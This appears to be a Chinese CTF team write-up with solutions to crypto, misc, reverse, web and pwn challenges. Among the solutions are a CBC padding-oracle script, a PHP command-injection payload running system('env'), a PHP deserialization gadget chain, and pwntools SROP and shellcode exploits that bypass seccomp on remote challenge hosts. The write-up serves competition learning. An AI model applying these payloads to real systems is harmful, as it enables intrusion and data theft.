CRYPTO
010101
漏洞点在
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'
p1只是随机的把1的位置转一个变成0,p2把0的位置随机转一个到1,直接逆回去即可
charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext160193174556824949951075954803233003012816842690127307013510848085346068610971287323876920567332357394122271978453722692457494759798599533250216644767344100147205757319259042511024425933666556684039902639955101810139671259542396251755746455288801028875220258179860863529775701930079256910152846601392232532282209264644554936501718333633068288255331839708706453437022604550696485775468107214433647142338976159359340611823716414851969716109410145514867492749907335929882188585826396855702227989094931315162925698963478866567024466631753790684450624332658872491214428430812988549793793090443138202365654656967830789022109840423787811071805221741453351818771857714177787861825654940160610738012477418672095750642785039751733677142793282708135464838052384986960446905830989908347842119190363468604134025815754338956523711042111079335239435093606014630717749855727048217630149446806934215370001997261252196944147153515660455403386295459397159476008740650783351875870788633500143273859204334981976611258076796194034758380177159012181004978352431457721036954027015879944370720046627251242934827003352629496019813125896143664802547084184729934742025133039198077975240749405903801407144490678961949065090990727629407793704805894056223679969091710110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581
exp
/*
* 提示:该行代码过长,系统自动注释不进行高亮。一键复制会移除系统注释
* from gmpy2 import *from Crypto.Util.number import *from tqdm import *n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581# p1=p[:1024]# p2=p[1024:]# pp1=[i for i, c in enumerate(p1) if c == '0']# pp2=[i for i, c in enumerate(p1) if c == '1']# print(pp1)# for i in tqdm(pp1):# p1 = list(p[:1024])# p1[i]='1'# for j in pp2:# p2 = list(p[1024:])# p2[j]='0'# ppp=''.join(p1) + ''.join(p2)# ppp2=int(ppp,2)# if n%ppp2==0:# print(ppp2)# breakp=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827print(isPrime(p))q=n//pe = 0x10001d=invert(e,(p-1)*(q-1))m=pow(c,d,n)print(long_to_bytes(m))
*/
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'
POA
cbc padding attack
from pwn import *from hashlib import sha256import stringfrom pwnlib.util.iters import mbruteforceimport binasciir = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digitsdef pow(): r.recvuntil("XXXX + ") suffix = r.recv(16).decode("utf8") r.recvuntil(":") cipher = r.recvline().strip().decode("utf8") proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() == cipher, table, length=4, method='fixed') r.sendline(proof)
pow()r.sendline('1')r.recvuntil('This is your flag: ')c=r.recvuntil('\n',drop=True)print('c=',c)iv = c[:32]cipher = c[32:]enc=binascii.unhexlify(cipher)iv=binascii.unhexlify(iv)print('enc=',enc)print('iv=',iv)pt = bytearray(b'\x00'*16)for make_pad_len in range(1, 17): xored_iv = bytearray(16) for i in range(16): xored_iv[i] = iv[i] ^ pt[i] index = 16-make_pad_len for i in range(0x100): _iv = bytearray(16) for j in range(index, 16): _iv[j] = xored_iv[j] ^ make_pad_len _iv[index] = i _iv = bytes(_iv.rjust(16, b'\x00'))+enc ivv=_iv.hex() r.sendline('2') r.recvuntil('Please enter ciphertext:\n') # print('tt=',len(tt)) print('ivv=',ivv) r.send(str(ivv)) res=r.recvuntil('\n') # print('res=',res) if b'True' in res: v = i ^ iv[index] ^ make_pad_len pt[index] = v print(chr(v), pt.hex(), bytes(pt)) breakr.interactive()
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}\x04\x04\x04\x04'[*] Switching to interactive mode
D0g3{0P@d4Ttk}
Rabin
第一步爆破x,获得r,从而n1=n//r=p*q
第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q
第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}
第三步,根据relation(),以及第一步,判断x比较可能是8,根据e2,爆破e1是2,rabin解密得到第一段D0g3{82309bce-9db6-53
最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
Python代码如下:
from Crypto.Util.number import *from gmpy2 import *n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505
r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627assert inv_p==invert(p,q)assert inv_q==invert(q,p)assert n==p*q*rn1=n//r#2 · 3^2 · 71phi=(p-1)*(q-1)def test(m): for i in m: if i<30 or i>128: return 0 return 1print(phi)def relation(e1,e2): a, b = 0, 0 for i in range(8 - (2**2 - 1)): a += pow(e1, i) for j in range(3): b += pow(e2, j) if a == b: return True return Falsee1=2e2=5mp = pow(c1, (p + 1) // 4, p)mq = pow(c1, (q + 1) // 4, q)a = (inv_p * p * mq + inv_q * q * mp) % n1b = n1 - int(a)c = (inv_p * p * mq - inv_q * q * mp) % n1d = n1- int(c)for i in (a, b, c, d): print(long_to_bytes(i))exit()
exit()for i in range(1,600): if(relation(i,e2)): print(i)exit()#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}from tqdm import tqdmfor i in tqdm(range(4,6)): if gcd(i,phi)>1: continue d=invert(i,phi) m=pow(c2,d,n1) m=long_to_bytes(m) if b"}" in m[:30] and test(m[:10])==1: print(i,m)exit()for x in range(2,100): r = 2 print("begin",x) while True: r = r * x if r.bit_length() > 1024 and isPrime(r - 1): r = r - 1 break if n%r==0: print(x,r)
MISC
dacongのWindows
桌面flag3一串PBE
根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc
aes解出flag3
document下secret.rar
rstudio恢复出来解压有点问题,用vol3
一堆空白
很明显的snow了
拿到flag2
提示music
dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去
39.wav拿到flag1
拼接flag
flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}
签到处
D0g3{We1come_TO_AXB_F1111@g}
Nahida
reverse jpg
文件尾
反复提到眼睛,猜测silenteye。那个你一直在寻找的答案,早已出现在你的旅途,fuzz后指的是密码是题目名
dacongのsecret
png fft拿到第一个密码
同样套路,jpg文件尾reverse 压缩包
又要密码
回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)
将19chunk块拿出来,补个png文件头(直接用题目png的文件头)
爆破一下宽高,860*123拿到key
解压后,一眼base64隐写
拿到pass,fuzz后是上一个jpg的jphs,拿到flag
疯狂的麦克斯
1.将docx文件转换为zip提取隐藏文件
2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号
3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文
使用rot13并将amount设置为22后密文解密后得到THIS IS MKS DO YOU KNOW WHOAMI
4.将列表也进行同样的解密,根据题目描述,只要将列表每一个值进行base64加密后,就可以在其中找到正确的压缩包密码
脚本如下
import base64
lst = ['71132E', '328051N', '248199O'...]
# 加密函数def encrypt_string(string): encoded_bytes = base64.b64encode(string.encode('utf-8')) return encoded_bytes.decode('utf-8')
# 打开文件with open('output.txt', 'w') as file: # 遍历列表中的每一个值 for value in lst: # 加密并写入文件 encrypted_value = encrypt_string(value) file.write(encrypted_value + '\n')
爆破
解压压缩包得到flag
REVERSE
MobileGo
libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023
之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换
解密脚本如下,首先通过Go语言生成伪随机数
package main
import ( "fmt" "math/rand")func main() { source := rand.NewSource(2023) random := rand.New(source) for i := 0; i < 0x26; i++ { randomNumber := random.Intn(0x26) randomNumber1 := random.Intn(0x26) fmt.Print("[", randomNumber, ",", randomNumber1, "]") fmt.Print(",") }}
然后从后往前还原,密文从Android的资源文件中提取
flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]for row in reversed(key): tmp=flag[row[0]] flag[row[0]]=flag[row[1]] flag[row[1]]=tmpprint(flag)
D0g3{4c3b5903d11461f94478b7302980e958}
你见过蓝色的小鲸鱼
通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密
from Crypto.Cipher import Blowfishkey=b'UzBtZTBuZV9EMGcz'bf=Blowfish.new(key,Blowfish.MODE_ECB)enc=b"\x11\xA5\x1F\x04\x95\x50\xE2\x50\x8F\x17\xE1\x6C\xF1\x63\x2B\x47"print(bf.decrypt(enc))#QHRoZWJsdWVmMXNo
牢大想你了
反编译Assembly-CSharp.dll文件
其中GameManager.OnValueChanged对输入完成TEA加密
解密脚本如下
#include<string.h>#include <stdio.h>
int main(){ unsigned int Data[12] = { 3363017039U, 1247970816U, 549943836U, 445086378U, 3606751618U, 1624361316U, 3112717362U, 705210466U, 3343515702U, 2402214294U, 4010321577U, 2743404694U }; unsigned int key[4] = { 286331153, 286331153, 286331153, 286331153 }; unsigned int tmp[2] = { 0 }; unsigned int sum = 0; unsigned int delta = 0x9e3779b9; for (int i = 0; i < 12; i += 2) { tmp[0] = Data[i]; tmp[1] = Data[i + 1]; sum = delta * 32; for (int j = 0; j < 32; ++j) { tmp[1] -= ((tmp[0] << 4) + key[2]) ^ (tmp[0] + sum) ^ ((tmp[0] >> 5) + key[3]); tmp[0] -= ((tmp[1] << 4) + key[0]) ^ (tmp[1] + sum) ^ ((tmp[1] >> 5) + key[1]); sum -= delta; } Data[i] = tmp[0]; Data[i + 1] = tmp[1]; printf("%c%c%c%c%c%c%c%c", ((char*)&Data[i])[0], ((char*)&Data[i])[1], ((char*)&Data[i])[2], ((char*)&Data[i])[3], ((char*)&Data[i + 1])[0], ((char*)&Data[i + 1])[1], ((char*)&Data[i + 1])[2], ((char*)&Data[i + 1])[3]); }
return 0;}
结果为 it_is_been_a_long_day_without_you_my_friend
你好,PE
找到关键代码,有点像CRC64
搜了个脚本一把梭
import struct
def decode_k(v): is_negative = v & 1 if is_negative: v ^= 0x54AA4A9 v >>= 1 if is_negative: v |= 0x8000000000000000 return v
g_key = '4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000'g_key = bytearray.fromhex(g_key)single_len = 8g_output = [g_key[x:x+single_len] for x in range(0, 6*single_len, single_len)]g_output = [struct.unpack('<Q', x)[0] for x in g_output]
def decode_j(v): for k in range(64): v = decode_k(v) return v
r = [decode_j(x) for x in g_output]flag = [struct.pack('<Q', x) for x in r]flag = [x.decode() for x in flag]print(''.join(flag))#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}
感觉有点点简单
主函数获取数据后进行魔改rc4和魔改base64加密
rc4魔改了sbox的大小和最后异或结果
base64魔改了表和位运算的操作
解密脚本
#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
unsigned char findPos(const unsigned char* base64_map, unsigned char c)//查找下标所在位置{ for (int i = 0; i < strlen((const char*)base64_map); i++) { if (base64_map[i] == c) return i; }}unsigned char* base64_decode(const unsigned char* code0){ unsigned char* code = (unsigned char*)code0; unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh"; long len, str_len, flag = 0; unsigned char* res; len = strlen((const char*)code); if (code[len - 1] == '=') { if (code[len - 2] == '=') { flag = 1; str_len = len / 4 * 3 - 2; }
else { flag = 2; str_len = len / 4 * 3 - 1; }
} else str_len = len / 4 * 3; res = (unsigned char*)malloc(sizeof(unsigned char) * str_len + 1); unsigned char a[4] = { 0 };
for (int i = 0, j = 0; j < str_len - flag; j += 3, i += 4) { a[0] = findPos(base64_map, code[i]); //code[]每一个字符对应base64表中的位置,用位置值反推原始数据值 a[1] = findPos(base64_map, code[i + 1]); a[2] = findPos(base64_map, code[i + 2]); a[3] = findPos(base64_map, code[i + 3]); res[j] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应 res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4); res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4); //res[j] = a[0] << 2 | a[1] >> 4; //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合 //res[j + 1] = a[1] << 4 | a[2] >> 2; //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合 //res[j + 2] = a[2] << 6 | a[3]; //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合 }
switch (flag) { case 0:break; case 1: { a[0] = findPos(base64_map, code[len - 4]); a[1] = findPos(base64_map, code[len - 3]); res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6); break; } case 2: { a[0] = findPos(base64_map, code[len - 4]); a[1] = findPos(base64_map, code[len - 3]); a[2] = findPos(base64_map, code[len - 2]); res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);//第一个字符对应 res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4); //res[str_len - 2] = a[0] << 2 | a[1] >> 4; //res[str_len - 1] = a[1] << 4 | a[2] >> 2; break; } } res[str_len] = '\0'; return res;}
unsigned char sbox[sboxSize] = { 0 };void swap(unsigned char* a, unsigned char* b){ unsigned char tmp = *a; *a = *b; *b = tmp;}void init_sbox(unsigned char key[], int keyLen) { for (unsigned int i = 0; i < sboxSize; i++)//赋值 sbox[i] = i; unsigned char Ttable[sboxSize] = { 0 }; for (int i = 0; i < sboxSize; i++) Ttable[i] = key[i % keyLen];//根据初始化t表 for (int j = 0, i = 0; i < sboxSize; i++) { j = (j + sbox[i] + Ttable[i]) % sboxSize; //打乱s盒 swap(&sbox[i], &sbox[j]); }}void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen) { unsigned char i = 0, j = 0; init_sbox(key, keyLen); for (unsigned int h = 0; h < dataLen; h++) { i = (i + 1) % sboxSize; j = (j + sbox[i]) % sboxSize; swap(&sbox[i], &sbox[j]); data[h] ^= (i^j)&sbox[(((i^j)+sbox[i]+sbox[j])%sboxSize)]; }}
int main() { unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw="; unsigned char* result=base64_decode(BaseData);//魔改base RC4_enc_dec(result, 41,(unsigned char*)"the_key_", 8);//魔改rc4
printf("%s", result); return 0;}
WEB
what’s my name
?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32
跑32次
easy_unserialize
<?phpclass Good{ public $g1; private $gg2='*&'; }class Luck{ public $l1; public $ll2; private $md5=1131911; public $lll3;}class To{ public $t1; public $tt2; public $arg1 = array("guangji"=>1); }class You{ public $y1; }class Flag{ }$F = new Flag;$F->SplFileObject = "/FfffLlllLaAaaggGgGg";$F->b = "";$l2 = new Luck;$l2->l1 = $F;$t2 = new To;$t2->t1 = $l2;$l = new Luck;$l->ll2 = $t2;$t = new To;$t->tt2 = $l;$g = new Good;$g->g1 = $t;$r = new Luck;$r->lll3 = $g;$q = new You;$q->y1 = $r;echo urlencode(serialize($q));
payload
D0g3=O%3A3%3A%22You%22%3A1%3A%7Bs%3A2%3A%22y1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BO%3A4%3A%22Good%22%3A2%3A%7Bs%3A2%3A%22g1%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BN%3Bs%3A3%3A%22tt2%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BN%3Bs%3A3%3A%22ll2%22%3BO%3A2%3A%22To%22%3A3%3A%7Bs%3A2%3A%22t1%22%3BO%3A4%3A%22Luck%22%3A4%3A%7Bs%3A2%3A%22l1%22%3BO%3A4%3A%22Flag%22%3A2%3A%7Bs%3A13%3A%22SplFileObject%22%3Bs%3A20%3A%22%2FFfffLlllLaAaaggGgGg%22%3Bs%3A1%3A%22b%22%3Bs%3A0%3A%22%22%3B%7Ds%3A3%3A%22ll2%22%3BN%3Bs%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A3%3A%22tt2%22%3BN%3Bs%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Luck%00md5%22%3Bi%3A1131911%3Bs%3A4%3A%22lll3%22%3BN%3B%7Ds%3A4%3A%22arg1%22%3Ba%3A1%3A%7Bs%3A7%3A%22guangji%22%3Bi%3A1%3B%7D%7Ds%3A9%3A%22%00Good%00gg2%22%3Bs%3A2%3A%22%2A%26%22%3B%7D%7D%7D
PWN
seccomp
一个输入长gadget的全局变量,一次溢出机会
有沙箱,但是可以orw读出flag,借助一部分srop的手法加以利用
from pwn import *import timeimport subprocesscontext(arch='amd64',os='linux',log_level='debug')command = "ls -l"#p = process('./chall')p=remote("47.108.206.43",22039)elf = ELF("./chall")
#libc = ELF("./libc-2.23.so")#libc = ELF("./libc.so.6")#context(arch="amd64",os="linux",log_level="debug")def s(a) : p.send(a)def sa(a, b) : p.sendafter(a, b)def sl(a) : p.sendline(a)def sla(a, b) : p.sendlineafter(a, b)def r() : return p.recv()def pr() : print(p.recv())def rl(a) : return p.recvuntil(a)def inter() : p.interactive()def get_addr(): return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#752leave = 0x40136csig = 0x0000000000401194sy = 0x000000000040118a#gdb.attach(p)
opena = SigreturnFrame() opena.rax = 0 opena.rdi = 2 opena.rsi = 0x404060 opena.rdx = 0opena.rcx = 0 opena.rip = elf.plt['syscall'] opena.rbp = 0x404060 + 0x20 opena.rsp = 0x404170read1 = SigreturnFrame() read1.rax = 0 read1.rdi = 0 read1.rsi = 3 read1.rdx = 0x404560read1.rcx = 0x30 read1.rip = elf.plt['syscall'] read1.rbp = 0x404060 + 0x20 read1.rsp = 0x404170+(0x404170-0x404060)-8write = SigreturnFrame() write.rax = 0 write.rdi = 1 write.rsi = 1 write.rdx = 0x404560write.rcx = 0x30 write.rip = elf.plt['syscall'] write.rbp = 0x404060 + 0x20 write.rsp = 0x404170+(0x404170-0x404060)sla("easyhack",b'./flag\x00\x00'+p64(sig)+p64(sy)+flat(opena)+p64(sig)+p64(sy)+flat(read1)+p64(sig)+p64(sy)+flat(write))
sla("SUID?",b'a'*(0x2a)+p64(0x404060)+p64(leave))
p.interactive()
side_channel,initiate!
from pwn import *
context.log_level = 'ERROR'context.terminal = ['wt.exe', 'wsl.exe', 'bash', '-c']context.binary = './chall'binary = context.binary
REMOTE = args.REMOTE or 1
syscall = 0x40118Abss = 0x404060FLAG = '/flag'
code = shellcraft.open(FLAG, 'O_RDONLY', 'rdx')code += shellcraft.read(3, bss+0xE00, 0x100)code += ''' xor eax, eax mov rdi, 0 mov rsi, 0x404F60 mov rdx, 2 syscall
movzx rcx, byte ptr [0x404F60] movzx rax, byte ptr [0x404F61] movzx rbx, byte ptr [0x404E60+rcx] cmp rax, rbx jge L_HANG jmp L_EXITL_HANG: xor eax, eax mov rdi, 0 mov rsi, 0x404F60 mov rdx, 1 syscallL_EXIT:
'''code += shellcraft.exit(0)
shellcode = asm(code)
def test(idx, ch): if REMOTE: p = remote('47.108.206.43', 37910) else: p = process('./chall')
pay1 = shellcode pay1 = pay1.ljust(0x100, b'A') pay1 += b'A'*0x8 pay1 += p64(0x401193) pay1 += p64(syscall)
frame = SigreturnFrame() frame.rax = constants.SYS_mprotect frame.rdi = 0x404000 frame.rsi = 0x1000 frame.rdx = 7 frame.rsp = bss+0x210 frame.rip = 0x401186 pay1 += bytes(frame) pay1 += p64(0x404060)
# gdb.attach(p, 'b *0x40118E') # sleep(1)
